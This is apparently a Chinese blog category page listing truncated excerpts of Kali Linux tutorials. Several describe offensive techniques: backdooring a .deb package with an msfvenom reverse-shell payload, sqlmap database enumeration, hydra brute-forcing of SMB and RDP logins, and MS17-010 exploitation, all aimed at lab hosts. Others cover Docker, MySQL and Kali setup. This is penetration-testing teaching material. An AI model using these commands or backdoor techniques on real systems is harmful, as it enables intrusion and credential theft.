Kali linux
文章平均质量分 71
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。注重于渗透测试,注重于Kali Linux的使用。
Dreamsi_zh
这个作者很懒,什么都没留下…
展开
-
Msfvenom制作deb软件包生成后门
一、下载正常软件包apt --download-only install freesweep //下载但不安装软件包freesweep二、复制到root用户加目录下为了便于后续操作,复制该软件包到root用户加目录下默认apt下载后软件包位置路径为:/var/cache/apt/archives/四、解压软件包将deb包解压五、生成恶意代码到软件源文件中msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tc原创 2021-08-13 16:28:01 · 693 阅读 · 0 评论 -
Msfvenom建立后门程序指令及开启监听
一、场景介绍原创 2021-08-13 14:27:18 · 7966 阅读 · 0 评论 -
Metasploit工具框架介绍
一、Metasploit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有原创 2021-08-09 00:58:24 · 997 阅读 · 0 评论 -
Sqlmap的基础使用
sqlmap使用方法:测试环境为Kali2021自带的sqlmap工具,目标为靶场环境。1、获取后台所有库sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ --dbs执行效果如下:已成功获取到所有库名2、获取对应库中的表sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms --tables执行效果如下所示:已成功获取到指定库的所有表信息3、获取对应库以原创 2021-07-28 18:54:26 · 278 阅读 · 0 评论 -
Hybra爆破工具应用
hydra 远程破解工具一、常用参数:-l 后面跟着 具体的用户名-p 后面跟着 具体的密码-L 后面跟着 用户字典-P 后面跟着 密码字典二、案例展示1、爆破smb服务hydra -l Administrator -P pass.txt smb://172.172.11.2092、爆破3389远程桌面hydra -l Administrator -P pass.txt rdp://172.172.11.209 -V3、一般爆破RDP最后别选择多进程、多线程hydra -l Adm原创 2021-07-27 21:09:50 · 713 阅读 · 0 评论 -
Centos环境下安装Docker环境
Docker 目前支持 CentOS 7 及以后的版本 。 系统的要求跟 Ubuntu 情况类似, 64 位操作系统,内核版本至少为 3.10 。首先,为了方便添加软件源,以及支持 device mapper 存储类型,安装如下软件包:原创 2021-07-26 21:57:34 · 257 阅读 · 0 评论 -
mysql数据库所有基本操作语句
一、库的操作1、查看所有的数据库名称Show databases;2、创建新的数据库Create database test;3、查看数据库的属性show create database test;4、进入数据库use test;5、删除数据库drop database tes1t;二、数据表的操作1、查看当前数据库下所有的数据表名称Show tables;2、创建新的数据表Create table 数据表名(字段名);例: create table tb_dem原创 2021-07-26 21:41:15 · 1244 阅读 · 0 评论 -
Windows MS17-010漏洞利用介绍
利用metasploit开源安全漏洞检测工具实现漏洞检测及利用1、metasploit介绍------Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。-...原创 2020-04-11 00:46:47 · 4143 阅读 · 2 评论 -
安装kali Linux
本次安装以kali 2018版本进行演示:1、kali安装包获取,进入kali官网https://www.kali.org/,进入downloads界面中,选择合适的版本进行下载,官网中给定的都是最新的版本。如果需要下载其他历史版本,可以到站点http://old.kali.org/kali-images/当中进行下载。官网提供下载的界面中,分别有kali的原版镜像版,还有对应的虚拟机版...原创 2020-04-01 20:58:17 · 978 阅读 · 0 评论 -
Kali基于debian系统软件源source.list文件格式说明
**在使用kali的过程中,为了保证系统工具的有效的特性,我们会选择更改kali linux的软件更新源地址,默认情况下自带的国外的更新源地址会有一定的延迟,下面来看看关于kali中使用的source.list文件中的更新源地址的格式:** 中科大 Kali 源:deb http://mirrors.ustc.edu.cn/kali kali main non-free contr...原创 2019-08-20 00:30:16 · 2194 阅读 · 0 评论 -
kali linux基本操作
一、APT安装软件apt是一个轻量级但功能十分强大的命令行工具,用于安装和删除软件包,命令为apt-get。apt-get可以对所有安装过的软件做好记录,可以跟中软件版本和软件之间相互依赖的关系。比如利用apt安装谷歌中文输入法,在终端键入如下命令apt-get install fcitx。会出现如下所示如果是已经安装完成的软件,在键入此命令时会去寻找更新。apt其他指令用法:apt-...原创 2019-08-25 23:58:18 · 1701 阅读 · 0 评论